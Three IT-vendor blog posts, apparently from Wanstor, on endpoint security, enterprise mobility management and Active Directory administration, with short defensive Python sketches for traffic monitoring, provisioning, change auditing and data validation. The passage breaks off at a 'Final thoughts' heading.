Endpoint Security – A state of transition

19th April 2018

Endpoint security used to be a fairly mundane topic. In the traditional model, the IT operations team would provision PCs with an approved image and then install anti-virus software on each system. The team would then make periodic security updates (vulnerability scanning, patches, signature updates, etc.), but the endpoint security foundation was generally straightforward and easy to manage.

However, in the last six months at Wanstor, we have seen a growing number of organisations increasing their focus on endpoint security and its associated people, processes and technologies. This is largely down to mobility strategies starting to mature, BYOD becoming more common and mobile working becoming the norm for many employees. Because of these market trends, many businesses and not for profit organisations have had to increase their endpoint security budgets to cope with the changing working practices they now face.

The maturing of these market trends has also meant many endpoint security vendors have had to change their strategies to cope with a transitioning end user workforce that wants a stable office environment combined with a flexible work-from-anywhere approach.

At Wanstor we have seen the endpoint security strategy changing and predominantly being driven by the following factors in many organisations:

Cyber risks need to be addressed, especially around information security best practices – This is a clear indication that many of the IT security processes organisations have in place are not fit for a changing regulatory and mobile landscape.

Problems caused by the volume and diversity of devices – Addressing new risks associated with mobile endpoints should be a top endpoint security strategy requirement for all IT departments. This will only increase with the addition of more cloud, mobile, and Internet-of-Things (IoT) technologies.

The need to address malware threats – Although malware has been around for a long time, many organisations are still struggling to get to grips with securing endpoints against it. At Wanstor we do not find this overly surprising, as the volume and sophistication of malware attacks has never been higher and the landscape is steadily becoming more dangerous. Additionally, the sophistication and efficiency of the cybercriminal underworld, alongside the easy access that would-be criminals have to sophisticated malware tools, are a combination organisations of all sizes need to take seriously. At Wanstor we meet with hundreds of customers on a regular basis and they are all saying the same thing: they are concerned about their ability to stop these malware threats and stay a step ahead of attackers.

While various industry research studies suggest endpoint security strategies are driven by the factors identified above, many businesses and not for profit organisations still struggle to address endpoint security vulnerabilities and threats with legacy processes and technologies.

Some of the most common things we see at Wanstor include:

Security teams spending too much time concentrating on attacks which are happening now and not planning for the future – As the threat landscape has evolved, so has the pressure on endpoint security staff, systems and processes. Many organisations have only one or possibly two trained IT security professionals, which means that when an attack happens they have to spend a lot of time attending to high-priority issues, leaving insufficient time for process improvement or strategic planning. This challenge is something of a contradiction: strategic improvements cannot and should not come at the expense of the security team failing to respond to high-priority issues, creating a quandary for many organisations. They know they need an endpoint security overhaul, but cannot afford to dedicate ample time to it at the expense of day-to-day security tactics. Effective endpoint tools must address this challenge by improving both the strategic and day-to-day position of the security team.

Organisations remain too focused on, or scared of, regulatory compliance – At Wanstor we know it is a balance between IT security budgets and regulatory compliance. However, we have recently seen many businesses and not for profit organisations spending too much money and effort on becoming compliant within a changing regulatory landscape. Quite often this is because IT security teams have not worked with the business to properly define what the new regulations actually mean for it and what the associated IT security spend should be. This often means IT security solutions are purchased ad hoc and cost the organisation more money in the long run, as they are bought with a short-term goal in mind rather than as part of a wider security and regulatory plan.

At Wanstor we believe regulatory compliance should come as a result of strong security, and endpoint security cannot be achieved with a compliance-centric approach. For many IT teams this will mean a shift in thinking and closer working with other business departments such as the finance and legal teams.

Endpoint security has too many manual processes and controls – Endpoint security has undergone a major technical transition, but many organisations continue to rely on legacy products and processes to combat new challenges. It is often cheaper and easier for businesses and not for profit organisations to layer new products on top of legacy products as needs arise. However, the trade-off is that IT security teams become more and more inefficient, as they have several layers of security processes and tools to manage, which can create a security operations nightmare.

Wanstor’s Top Endpoint Security Challenges

  • Security staff spending a significant amount of time attending to high-priority issues, leaving no time for process improvement or strategic planning
  • Organisations more focused on meeting regulatory compliance requirements than on addressing endpoint security risks with strong controls
  • Endpoint security based upon too many manual processes, making it difficult for security staff to keep up to date with relevant security tasks and new technology trends
  • Organisations viewing endpoint security as a basic requirement and not giving it the time or resources it needs to protect users
  • Lack of proactive monitoring of endpoint activity, making it difficult to detect a security incident
  • Businesses and not for profit organisations lacking the right vulnerability scanning and/or patch management tools, leaving their endpoints perpetually vulnerable to compromise by malware
  • Lack of budget to purchase the right endpoint security products, as IT teams are unsure how to develop the right business case for management teams to make decisions on

In summary, Wanstor’s research into its own customers, together with the changing mobility landscape, points to a situation where the prevailing endpoint security approach is not an adequate countermeasure for the complexity and sophistication of modern IT security threats.

Wanstor’s own customer and market research strongly suggests that businesses and not for profit organisations do not currently view existing endpoint security strategies as viable for blocking sophisticated attacks. As a result, many organisations need to supplement their existing endpoint security products with newer and more robust technologies that offer more functionality across incident detection, response and remediation.

As a matter of course, Wanstor believes all IT teams should take action now to review their endpoint security strategies and evaluate whether or not they are fit for purpose against business requirements. As a minimum, the IT team should:

Investigate and test advanced anti-malware products – Organisations of all sizes should investigate and potentially acquire advanced anti-malware solutions, because traditional solutions are no longer “good enough” to protect an organisation on their own. Instead, IT teams need to recognise that all organisations are targets for hackers. In turn, this means they should seek the strongest possible endpoint security solutions in order to deal with potential threats both now and in the future.

Continuous endpoint monitoring – As the great management saying goes, “If you can’t monitor it, you can’t manage it”. The question has to be: does your IT team have the right network and security monitoring in place? If it doesn’t, how will you even know you are under attack, or which endpoint devices are most vulnerable to attack? At Wanstor we always recommend that appropriate network monitoring tools are purchased by the IT team. Quite often network monitoring, and the ability to detect abnormal network traffic patterns early, helps to prevent many security attacks before they become business critical.
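As a rough illustration of the kind of early-warning check a network monitoring tool performs, the sketch below flags an endpoint whose traffic volume deviates sharply from its recent baseline. The threshold and byte counts are illustrative assumptions, not taken from any particular product:

```python
from statistics import mean, stdev

def is_abnormal(history, current, threshold=3.0):
    """Flag a traffic sample that deviates from an endpoint's baseline.

    history: recent per-interval byte counts for one endpoint (the baseline)
    current: the latest observed byte count
    threshold: how many standard deviations from the mean counts as abnormal
    """
    if len(history) < 2:
        return False  # not enough data to establish a baseline
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:
        return current != mu
    return abs(current - mu) / sigma > threshold

# Example: a steady baseline of ~10 KB per interval, then a huge burst
baseline = [9800, 10100, 10050, 9900, 10200, 9950]
print(is_abnormal(baseline, 10020))      # ordinary fluctuation
print(is_abnormal(baseline, 5_000_000))  # exfiltration-sized spike
```

Real products use far richer signals (destinations, ports, time of day), but the principle is the same: establish a baseline per endpoint, then alert on statistically unusual behaviour before it becomes business critical.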

Endpoint forensics – Endpoint forensic solutions can (when focused on actual need, not cost) improve efficiency and effectiveness related to incident response, and reduce the time it takes to detect an incident. Additionally, integrating endpoint data with network security analytics gives IT teams a more comprehensive and integrated view of security activities across networks and host systems.

In conclusion, endpoint security needs to change in most organisations to meet changing user needs and demands on IT. At the present time many organisations are struggling to hire the right staff, choose the right technologies, and respond to the many challenges of modern threats. The scale and diversity of these challenges can appear overwhelming, but organisations that take the time to devise and execute solid, integrated endpoint security strategies can achieve the right returns on their security investments and protect their organisations at the same time.

Wanstor believes that organisations who are seeking to overhaul their endpoint security should integrate their endpoint security technologies with their network-level and log monitoring in order to improve incident detection, prevention, and response, while also streamlining the work of their security operations team.

For more information about Wanstor’s endpoint security services, please visit – https://www.wanstor.com/managed-it-security-services-business.htm


Enterprise Mobility Management – making sure the fundamentals are right

9th April 2018

Mobility and bring-your-own device (BYOD) are transforming the way people work and the way businesses support them. At Wanstor we believe there is more to mobility than simply enabling remote access. To unlock the full potential of enterprise mobility, IT departments need to allow people the freedom to access all their apps and data from any device, seamlessly and conveniently. Mobile devices also call for the right approach to IT security to protect business information as they are used in more places, over untrusted networks, with a significant potential for loss or theft. The IT department has to maintain compliance and protect sensitive information wherever and however it’s used and stored, even when business and personal apps live side-by-side on the same device.

In this article, Wanstor’s mobility experts have developed a set of key points which the IT department needs to take notice of as an enterprise mobility strategy is developed.

Protect and manage key assets, data and information

As employees access data and apps on multiple devices (including personally owned smartphones and tablets), it is no longer realistic for IT to control and manage every aspect of the environment. At Wanstor we believe the approach IT teams should take is to focus on what matters most for the business across devices, data and information, then choose the mobility management models that make the most sense for the business and its mobile use cases.

Generally it is accepted that there are four models to choose from, either individually or in combination: mobile device management (MDM), mobile hypervisors and containers, mobile application management (MAM), and application and desktop virtualisation. Choosing the right mix of these four models will be intrinsically linked to the success of the business.

User experience needs to be at the centre of your thinking

Mobile devices have been a key driver of consumerisation in the enterprise, giving people powerful new ways to work with apps and information in their personal lives. This has raised expectations of IT and the services it provides, particularly around mobile devices. No longer can IT teams put strict controls on users; instead they must offer an IT experience that compares with the freedom and convenience allowed by consumer technology companies. At Wanstor we always suggest that before MDM planning gets underway, the IT team sits down with a range of users and talks about their needs and preferences, to make sure the mobility strategy which is going to be put in place gives them what they really want.

As the IT team works to deliver a superior user experience, Wanstor's experts suggest that they examine ways to give people more than they expect and provide useful capabilities they might not have thought of, for example:

  • Allow employees to access their apps and data on any device they use, complete with personal settings, so they can start work immediately once they have been given their work device
  • Give people the choice of self-service provisioning for any app they need through an enterprise app store with single sign-on
  • Automate controls on data sharing and management, such as the ability to copy data between applications, so people don’t have to remember specific policies
  • Define allowed device functionality on an app-by-app basis, so people can still use functions such as printing, camera and local data storage on some of their apps even if IT needs to turn them off for other apps
  • Make it simple for people to share and sync files from any device, and to share files with external parties simply by sending a link.

By developing a mobility strategy in collaboration with users, IT teams can better meet users’ needs while gaining a valuable opportunity to set expectations. This helps to make sure employees understand IT’s own requirements for ensuring compliance.

Avoid bypassing

Bypassing company controls and policies via a mobile device represents the worst-case scenario for enterprise mobility. It is surprisingly common for users who cannot find or access what they need on their mobile device to bypass IT altogether and access their own cloud services, apps and data.

Many people think it is great that employees are accessing what they want, when they need it. Actually, nothing could be further from the truth. Employees accessing unknown apps, handling sensitive data via public clouds and downloading files in ways that bypass the visibility and control policies of IT leave a business extremely vulnerable to attack. In reality, IT policies and user education can only go so far to prevent bypasses from happening; realistically, if it’s the best solution for someone’s needs and it seems unlikely that IT will find out, it’s going to happen. This makes it essential to provide people with an incentive to work with IT and use its infrastructure, especially when it comes to sensitive data and apps. The best incentive is a superior user experience, delivered proactively and designed to meet people’s needs better than the unmanaged alternative.

Embed mobility in your service delivery strategy

Mobile users rely on a variety of application types – not just custom mobile apps, but also third-party native mobile apps, Windows apps and SaaS solutions. In developing a mobility strategy, IT teams should think about the mix of apps used by the people and groups in their business, and how they should be accessed on mobile devices. It is widely accepted that there are four ways for people to access apps on mobile devices: natively, through virtualised access, through a containerised experience, and through a fully managed enterprise experience.

For most businesses, a combination of virtualized access and a containerized experience will support the full range of apps and use cases people rely on. This also makes it possible for IT to maintain visibility and control while providing a superior user experience. People can access hosted applications and native mobile apps—as well as SaaS apps such as Salesforce and NetSuite— through a unified enterprise single sign-on. When an employee leaves the business, IT can immediately disable the person’s account to remove access to all native mobile, hosted and SaaS apps used on the device.

Automation is the key to successful EMM outcomes

Automation not only simplifies life for the IT department, it also helps them deliver a better user experience. Think about the difference automation can make in addressing common mobility needs like:

  • An employee replaces a lost device or upgrades to a new one. With the click of a single URL, all of the individual’s business apps and work information are available on the new device, ready for work.
  • As an employee moves from location to location and network to network, situational and adaptive access controls reconfigure apps automatically to make sure appropriate security, with complete transparency for the user.
  • A board member arrives for a meeting, tablet in hand. All the documents for the meeting are automatically loaded onto the device, configured selectively by IT for read-only access, and restricted to a containerized app as needed. Especially sensitive documents can be set to disappear automatically from the device as soon as the member leaves the room.
  • As employees change roles in the business, the relevant apps for their current position are made available automatically, while apps that are no longer needed disappear. Third-party SaaS licenses are instantly reclaimed for reassignment.

One way to perform this type of automation is through Active Directory. First, link a specific role with a corresponding container. Anyone defined in that role will automatically inherit the container and all the apps, data, settings and privileges associated with it. On the device itself, you can use MDM to centrally set up Wi-Fi PINs and passwords, user certificates, two-factor authentication and other elements as needed to support these automated processes.
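The role-to-container inheritance described above can be sketched in simplified form. The roles, container names and settings below are invented for illustration; a real implementation would read group membership from Active Directory and push the resulting configuration through an MDM platform:

```python
# Hypothetical container definitions and role mappings. In practice these
# would mirror Active Directory groups and an MDM policy catalogue.
CONTAINERS = {
    "finance": {"apps": ["expenses", "payroll"],
                "wifi_profile": "corp-secure", "two_factor": True},
    "field-sales": {"apps": ["crm", "quotes"],
                    "wifi_profile": "corp-standard", "two_factor": False},
}

ROLE_TO_CONTAINER = {"Finance Analyst": "finance", "Sales Rep": "field-sales"}

def provision_for_roles(roles):
    """Merge the container entitlements a user inherits from their roles."""
    merged = {"apps": set(), "wifi_profile": None, "two_factor": False}
    for role in roles:
        container = CONTAINERS.get(ROLE_TO_CONTAINER.get(role, ""))
        if container is None:
            continue  # role carries no mobility entitlements
        merged["apps"].update(container["apps"])
        merged["wifi_profile"] = merged["wifi_profile"] or container["wifi_profile"]
        merged["two_factor"] = merged["two_factor"] or container["two_factor"]
    return merged

profile = provision_for_roles(["Finance Analyst"])
print(sorted(profile["apps"]))  # apps inherited from the finance container
```

The key design point is that entitlements flow from the role, not the individual: when someone changes role, re-running the same derivation automatically adds the new container and drops the old one, which is exactly the behaviour described in the bullet list above.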

Define networking requirements

Different applications and use cases can have different networking requirements, from an intranet or Microsoft SharePoint site, to an external partner’s portal, to a sensitive app requiring mutual SSL authentication. Enforcing the highest security settings at the device level degrades the user experience unnecessarily; on the other hand, requiring people to apply different settings for each app can be even more tiresome for them.

By locking down networks to specific containers or apps, with separate settings defined for each, the IT team can make networking specific to each app without requiring extra steps from the user. People can just click on an app and get to work, while tasks such as signing in, accepting certificates or opening an app-specific VPN launch automatically by policy in the background.

Protect sensitive data

Unfortunately, in many businesses IT doesn’t know where the most sensitive data resides, and so must treat all data with the same top level of protection – an inefficient and costly approach. Mobility provides an opportunity for IT teams to protect data more selectively, based on a classification model that meets unique business and security needs.

Many companies use a relatively simple model that classifies data into three categories (public, confidential and restricted) and take into account the device and platform used; other businesses have a much more complex classification model that also considers factors such as user role and location.

The data model deployed should take into account both data classification and device type. IT teams may also want to layer additional considerations, such as device platform, location and user role, into their security policy. By configuring network access through enterprise infrastructure for confidential and restricted data, IT teams can capture complete information on how people are using information, to assess the effectiveness of their data sensitivity model and mobile control policy.
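The three-tier classification combined with device type amounts to a policy lookup table. The sketch below is purely illustrative: the control names and the rule that restricted data is blocked on unmanaged devices are assumptions for the example, not prescriptions:

```python
# (classification, managed_device) -> controls applied. A real policy engine
# would also factor in platform, location and user role, as discussed above.
POLICY = {
    ("public", True): {"encrypt": False, "route_via_corp": False},
    ("public", False): {"encrypt": False, "route_via_corp": False},
    ("confidential", True): {"encrypt": True, "route_via_corp": True},
    ("confidential", False): {"encrypt": True, "route_via_corp": True,
                              "container_only": True},
    ("restricted", True): {"encrypt": True, "route_via_corp": True,
                           "container_only": True},
    ("restricted", False): {"blocked": True},  # never on unmanaged devices
}

def controls_for(classification, managed_device):
    """Look up the handling controls for a data/device combination."""
    key = (classification, managed_device)
    if key not in POLICY:
        raise ValueError(f"unclassified data/device combination: {key}")
    return POLICY[key]

print(controls_for("restricted", False))  # unmanaged device: access blocked
```

Making the table explicit, rather than burying rules in per-app settings, is what lets IT audit the model and spot combinations that were never classified at all.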

Be clear about roles and ownership

Who in your business will own enterprise mobility? In most companies, mobility continues to be addressed through an ad hoc approach, often by a committee overseeing IT functions from infrastructure and networking to apps. Given the strategic role of mobility in the business, and the complex matrix of user and IT requirements to be addressed, it’s crucial to clearly define the structure, roles and processes around mobility. People should understand who is responsible for mobility and how they will manage it holistically across different IT functions. Ownership needs to be equally clear when it comes to mobile devices themselves. Your BYOD policy should address the grey area between fully managed, corporate-owned devices and user-owned devices strictly for personal use – for example:

Who is responsible for backups for a BYO device?

Who provides support and maintenance for the device, and how is it paid for?

How will discovery be handled if a subpoena seeks data or logs from a personally owned device?

What are the privacy implications for personal content when someone uses the same device for work?

Both users and IT should understand their roles and responsibilities to avoid misunderstandings.

Build compliance into the solution

Globally, businesses now face more than 300 security and privacy-related standards, regulations and laws, with more than 3,500 specific controls. It is therefore not enough to simply try to meet these requirements; businesses need to be able to document compliance and allow full auditability.

Many businesses have already solved the compliance challenge within their network. The last thing the IT department wants is for enterprise mobility to create a vast new problem to solve. IT departments should therefore make sure mobile devices and platforms support seamless compliance with government mandates, industry standards and corporate security policies, from policy- and classification-based access control to secure data storage. The EMM solution should provide complete logging and reporting to help respond to audits quickly, efficiently and successfully.

Prepare for the future

Don’t write your policies for only today! Keep in mind what enterprise mobility will look like in the next few years. Mobility, devices and users’ needs will continue to evolve and expand the potential of mobility, but they will also introduce new implications for security, compliance, manageability and user experience. IT departments need to pay attention to ongoing industry discussions about emerging technologies, and design their mobility strategy around core principles that can apply to any type of mobile device and use case. This way, they can minimise the frequent policy changes and iterations that may confuse and frustrate people.


Overcoming Active Directory Administrator Challenges

23rd February 2018

The central role of Active Directory in business environments

Deployment of and reliance upon Active Directory in the enterprise continue to grow at a rapid pace, and the directory is increasingly becoming the central storage point for sensitive user data as well as the gateway to critical business information. It provides businesses with a consolidated, integrated and distributed directory service, and enables the business to better manage user and administrative access to business applications and services.

Over the past 10+ years, Wanstor has seen Active Directory’s role in the enterprise drastically expand, as has the need to secure the data it both stores and enables access to. Unfortunately, native Active Directory administration tools provide little control over user and administrative permissions and access. This lack of control makes the secure administration of Active Directory a challenging task for IT administrators. In addition to limited control over what users and administrators can do within Active Directory, the directory has limited ability to report on the activities performed within it. This makes it very difficult to meet audit requirements and to secure Active Directory. As a result, many businesses need assistance in creating repeatable, enforceable processes that will reduce their administrative overhead, whilst helping increase the availability and security of their systems.

Because Active Directory is an essential part of the IT infrastructure, IT teams must manage it both thoughtfully and diligently – controlling it, securing it and auditing it. Not surprisingly, with an application of this importance there are challenges to confront and resolve in reducing risk, whilst deriving maximum value for the business. This blog will examine some of the most challenging administrative tasks related to Active Directory.

Compliance Auditing and Reporting

To satisfy audit requirements, businesses must demonstrate control over the security of sensitive and business-critical data. However, without additional tools, demonstrating regulatory compliance with Active Directory is time-consuming, tedious and complex.

Auditors and stakeholders require detailed information about privileged-user activity. This level of granular information allows interested parties to troubleshoot problems and also provides information necessary to improve the performance and availability of Active Directory.

Auditing and reporting on Active Directory has always been a challenge. To more easily achieve, demonstrate and maintain compliance, businesses should employ a solution that provides robust, custom reporting and auditing capabilities. Reporting should provide information on what, when and where changes happen, and who made the changes.

Reporting capabilities should be flexible enough to provide graphical trend information for business stakeholders, while also providing granular detail necessary for administrators to improve their Active Directory deployment. Solutions should also securely store audit events for as long as necessary to meet data retention requirements and enable the easy search of these events.
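The who/what/when/where reporting described above amounts to filtering and sorting securely stored audit events. A minimal sketch, assuming the events have already been collected from the directory's audit log (the event shape and field names here are hypothetical):

```python
from datetime import datetime

# Hypothetical stored audit events; a real solution would read these from a
# secure, retention-managed event store.
events = [
    {"when": datetime(2018, 2, 1, 9, 30), "who": "jsmith",
     "what": "member added to Domain Admins", "where": "DC-LON-01"},
    {"when": datetime(2018, 2, 1, 11, 5), "who": "svc-backup",
     "what": "password reset for finance-user", "where": "DC-LON-02"},
]

def report(events, who=None, since=None):
    """Filter audit events by actor and time, oldest first, for an auditor."""
    rows = [e for e in events
            if (who is None or e["who"] == who)
            and (since is None or e["when"] >= since)]
    return sorted(rows, key=lambda e: e["when"])

for e in report(events, who="jsmith"):
    print(f'{e["when"].isoformat()} {e["who"]}: {e["what"]} on {e["where"]}')
```

Keeping every event searchable by actor, time and domain controller is what turns raw logging into the "what, when, where and who" reporting auditors actually ask for.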

Group Policy Management

Microsoft recommends that Group Policy be a cornerstone of Active Directory security. Leveraging the powerful capabilities of Group Policy, IT teams can manage and configure user and asset settings, applications and operating systems from a central console. It is an indispensable resource for managing user access, permissions and security settings in the Windows environment.

However, maintaining a large number of Group Policy Objects (GPOs), which store policy settings, can be a challenging task. For example, administrators should take special care in large IT environments with many system administrators, because changes to GPOs can affect every computer or user in a domain in real time. Yet Group Policy lacks true change-management and version-control capabilities. Due to the limited native controls available, accomplishing something as simple as deploying a shortcut requires writing a script. Custom scripts are often complex to create and difficult to debug and test. If a script fails or causes disruption in the live environment, there is no way to roll back to the last known setting or configuration. Malicious or unintended changes to Group Policy can have devastating and permanent effects on an IT environment and a business.

To prevent Group Policy changes that can negatively impact the business, IT teams often restrict administrative privilege to a few highly-skilled administrators. As a result, these staff members are overburdened with administering Group Policy rather than supporting the greater goals of the business. To leverage the powerful capabilities of Group Policy, it is necessary to have a solution in place that provides a secure offline repository to model and predict the impact of Group Policy changes before they go live. The ability to plan, control and troubleshoot Group Policy changes, with an approved change and release-management process, enables IT teams to improve the security and compliance of their Windows environment without making business-crippling administrative errors.
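The offline modelling and rollback capability described above can be sketched as a versioned settings repository. The setting names below are invented for illustration; a real product would store actual GPO settings and deploy them through an approved change- and release-management workflow:

```python
import copy

class GpoRepository:
    """Offline, versioned store for one GPO's settings (illustrative only)."""

    def __init__(self, initial_settings):
        self.versions = [copy.deepcopy(initial_settings)]

    def propose(self, changes):
        """Model a change offline and return the would-be result (no deploy)."""
        candidate = copy.deepcopy(self.versions[-1])
        candidate.update(changes)
        return candidate

    def commit(self, changes):
        """Record an approved change as a new version."""
        self.versions.append(self.propose(changes))

    def rollback(self):
        """Discard the latest version, restoring the last known-good one."""
        if len(self.versions) > 1:
            self.versions.pop()
        return self.versions[-1]

repo = GpoRepository({"password_min_length": 8, "usb_storage": "allowed"})
repo.commit({"usb_storage": "blocked"})
print(repo.rollback())  # restores the last known-good configuration
```

The point of the sketch is the separation between `propose` (predict the impact offline) and `commit` (release), plus a rollback path, which is precisely what native Group Policy lacks.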

Businesses should also employ a solution for managing Group Policy that enables easy and flexible reporting to demonstrate that they’ve met audit requirements.

User Provisioning, Re-provisioning and De-provisioning

Most employees require access to several systems and applications, and each programme has its own account and login information. Even with today’s more advanced processes and systems, employees often find themselves waiting for days for access to the systems they need. This can cost businesses thousands of pounds in lost productivity and employee downtime.

To minimise workloads and expedite the provisioning process, many businesses treat Active Directory as the authoritative data store for managing user account information and access rights to IT resources and assets. Yet provisioning, re-provisioning and de-provisioning access via Active Directory is often a manual process. In a large business, maintaining appropriate user permissions and access can be a time-consuming activity, especially when the business has significant personnel turnover. Systems administrators often spend hours creating, modifying and removing credentials; in a large, complex business, manual provisioning can take days. There are no automation or policy enforcement capabilities native to Active Directory, and with so little control in place there is no way to make sure that users will receive the access they need when they need it.

Additionally, there is no system of checks and balances. Administrative errors can easily result in elevated user privileges that can lead to security breaches, malicious activity or unintended errors that can expose the business to significant risk. Businesses should look for an automated solution to execute provisioning activities. Implementing an automated solution with approval capabilities greatly reduces the burden on administrators, improves adherence to security policies, improves standards and decreases the time a user must wait for access. It also speeds up the removal of user access, which minimizes the ability of a user with malicious intent to access sensitive data.
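The approval-gated provisioning workflow described above might be sketched as follows. This is a deliberately simplified model (all names are hypothetical); real solutions integrate with Active Directory, HR systems and ticketing tools:

```python
from dataclasses import dataclass

@dataclass
class AccessRequest:
    user: str
    systems: list
    approved: bool = False

class ProvisioningQueue:
    """Queue access requests, apply them only after approval."""

    def __init__(self):
        self.pending = []
        self.granted = {}  # user -> set of systems they can access

    def request(self, user, systems):
        req = AccessRequest(user, list(systems))
        self.pending.append(req)
        return req

    def approve_and_apply(self, req):
        """The checks-and-balances step: access is granted only here."""
        req.approved = True
        self.granted.setdefault(req.user, set()).update(req.systems)
        self.pending.remove(req)

    def deprovision(self, user):
        """Remove all access in one step when someone leaves."""
        return self.granted.pop(user, set())

queue = ProvisioningQueue()
req = queue.request("new.starter", ["email", "crm", "file-share"])
queue.approve_and_apply(req)
removed = queue.deprovision("new.starter")
```

Two properties matter: no access is applied without passing through the approval step, and de-provisioning revokes everything at once, closing the window in which a leaver with malicious intent could reach sensitive data.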

Secure Delegation of User Privilege

Reducing the number of users with elevated administrative privileges is a constant challenge for the owners of Active Directory. Many user and helpdesk requests require interaction with Active Directory, but these common interactions often result in elevated access for users who do not need it to perform their jobs. Because there are only two levels of administrative access in Active Directory (Domain Administrator or Enterprise Administrator), it is very difficult to control what users can see and do once they gain administrative privileges.

Once a user has access to powerful administrative capabilities, they can easily access sensitive business and user information, elevate their privileges and even make changes within Active Directory. Elevated administrative privileges, especially when in the hands of someone with malicious intent, dramatically increase the risk exposure of Active Directory and the applications, users and systems that rely upon it. At Wanstor we have found through our years of experience of dealing with Active Directory that it is not uncommon for a business to discover that thousands of users have elevated administrative privileges. Each user with unauthorized administrative privileges presents a unique threat to the security of the IT infrastructure and business. Coupled with Active Directory’s latent vulnerabilities, it is easy for someone to make business-crippling administrative changes. When this occurs, troubleshooting becomes difficult, as auditing and reporting limitations make it nearly impossible to quickly gather a clear picture of the problem.

To reduce the risk associated with elevated user privilege and make sure that users only have access to the information they require, businesses should seek a solution that can securely delegate entitlements. This is a requirement to meet separation-of-duties mandates, as well as a way to share the administrative load by securely delegating privileges to subordinates.

Change Auditing and Monitoring

To achieve and maintain a secure and compliant IT environment, IT administrators must control change and monitor for unauthorized changes that may negatively impact their business. Active Directory change auditing is an important procedure for identifying and limiting errors and unauthorized changes to Active Directory configuration. One single change can put a business at risk, introducing security breaches and compliance issues.

Native Active Directory tools fail to proactively track, audit, report and alert administrators about vital configuration changes. Additionally, native real-time auditing and reporting on configuration changes, day-to-day operational changes and critical group changes do not exist. This exposes the business to risk, as the IT team’s ability to correct and limit damage is dependent on their ability to detect and troubleshoot a change once it has occurred.

A change that goes undetected can have a drastic impact on a business. For example, someone who elevated their privileges and assumed the identity of a senior member of the finance department could potentially access company funds, resulting in theft, fraudulent wire transfers and so forth. To reduce risk and help prevent security breaches, businesses should employ a solution that provides comprehensive change monitoring. This solution should include real-time change detection, intelligent notification, human-readable events, central auditing and detailed reporting. Employing a solution that encompasses all of these elements will enable IT teams to quickly and easily identify unauthorized changes, pinpoint their source, and resolve issues before they negatively impact the business.
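The snapshot-and-diff idea behind change detection can be sketched in a few lines. This is an illustrative sketch only: the attribute names below are invented, and real change-monitoring products subscribe to the directory's event stream in real time rather than comparing snapshots.

```python
# Illustrative sketch: detect changes between two snapshots of directory
# attributes and emit human-readable events for review. The attribute
# names below are hypothetical, not real Active Directory schema paths.

def diff_snapshot(before, after):
    """Return a sorted list of human-readable change events."""
    events = []
    for key in before.keys() | after.keys():
        old, new = before.get(key), after.get(key)
        if old != new:
            events.append(f"{key}: {old!r} -> {new!r}")
    return sorted(events)

before = {"jsmith/memberOf": ["Staff"], "mjones/memberOf": ["Staff"]}
after = {"jsmith/memberOf": ["Staff", "Domain Admins"], "mjones/memberOf": ["Staff"]}

for event in diff_snapshot(before, after):
    print(event)  # jsmith's unexpected elevation is flagged for review
```

The value of a dedicated tool is in doing this continuously, alerting in real time and recording who made each change, which a periodic diff cannot do.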

Maintaining Data Integrity

It is important for businesses of all sizes to make sure that the data housed within Active Directory supports the needs of the business, especially as other applications rely on Active Directory for content and information.

Data integrity involves both the consistency of data and the completeness of information. For example, there are multiple ways to enter a phone number, and entering data in inconsistent formats creates data pollution, which inhibits the business from efficiently organizing and accessing important information. Another example of data inconsistency is the ability to abbreviate a department name. Think of the various ways to abbreviate “Accounting”. If there are inconsistencies in Active Directory’s data, there is no way to make sure that an administrator can group all the members of accounting together, which is necessary for payroll, communications, systems access and so on.

Another vital aspect of data integrity when working with Active Directory is the completeness of information. Active Directory provides no control over content that is entered natively. If no controls are in place, administrators can enter information in any format they wish and leave fields that the business relies upon blank.

To support and provide trustworthy information to all aspects of the business that rely on Active Directory, businesses should employ a solution that controls both the format and completeness of data entered in Active Directory. By putting these controls in place, IT teams can drastically reduce data pollution and significantly improve the uniformity and completeness of the content in Active Directory.
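As a simple illustration of format and completeness controls, the sketch below normalises phone numbers to one canonical form and rejects records with required fields left blank. The field names are examples chosen for illustration, not real directory schema attributes.

```python
import re

# Illustrative sketch: normalise phone numbers to one canonical format and
# reject records with required directory fields left blank. The field names
# here are examples, not real Active Directory schema attributes.

REQUIRED_FIELDS = ("name", "department", "phone")

def normalise_phone(raw):
    """Strip everything but digits so '020 7592 7860' and '(020) 7592-7860' match."""
    return re.sub(r"\D", "", raw)

def validate_record(record):
    """Reject incomplete records, then normalise the phone field in place."""
    for field in REQUIRED_FIELDS:
        if not record.get(field, "").strip():
            raise ValueError(f"required field '{field}' is blank")
    record["phone"] = normalise_phone(record["phone"])
    return record

record = validate_record(
    {"name": "J Smith", "department": "Accounting", "phone": "(020) 7592-7860"}
)
print(record["phone"])  # 02075927860
```

With every record forced through checks like these before it is written, grouping all members of “Accounting” together becomes a reliable query rather than guesswork.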

Self-Service Administration

Most requests made by the business or by users require access to and administration of Active Directory. This is often manual work and there are few controls in place to prevent administrative errors. Active Directory’s inherent complexity makes these errors common, and just one mistake could do damage to the entire security infrastructure. With the lack of controls, the business cannot have just anyone administering Active Directory.

While it may be practical to employ engineers and consultants to install and maintain Active Directory, businesses cannot afford to have their highly-skilled and valuable employees spending the majority of their time responding to relatively trivial user requests. Self-service administration and automation are logical solutions for businesses looking to streamline operations, become more efficient and improve compliance. This is achieved by placing controls around common administrative tasks and enabling the system to perform user requests without tasking highly skilled administrators.

Businesses should identify processes that are routine yet hands-on, and consider solutions that provide user self-service and automation of the process. Automating these processes reduces the workload on highly-skilled administrators and improves compliance with policies, since automation does not allow users to skip steps in the process. Businesses should also look for self-service and automation solutions that allow for approval and provide a comprehensive audit trail of events to help demonstrate policy compliance.
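The request, approval and audit-trail flow described above can be sketched as follows. This is a hypothetical illustration of the workflow shape, not any particular product's API; function and field names are invented.

```python
from datetime import datetime, timezone

# Hypothetical sketch of the request -> approval -> execution flow,
# with every step recorded in an audit trail for compliance reporting.

audit_log = []

def record(event, request_id, actor):
    audit_log.append({
        "time": datetime.now(timezone.utc).isoformat(),
        "event": event,
        "request": request_id,
        "actor": actor,
    })

def submit_request(request_id, user):
    record("submitted", request_id, user)

def approve_request(request_id, approver):
    record("approved", request_id, approver)

def execute_request(request_id):
    # ...perform the actual provisioning task here...
    record("executed", request_id, "automation")

submit_request("REQ-1", "jsmith")
approve_request("REQ-1", "manager")
execute_request("REQ-1")
```

Because the automation itself writes each entry, a user cannot skip the approval step, and the log shows who requested, who approved and when each task ran.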

Final thoughts

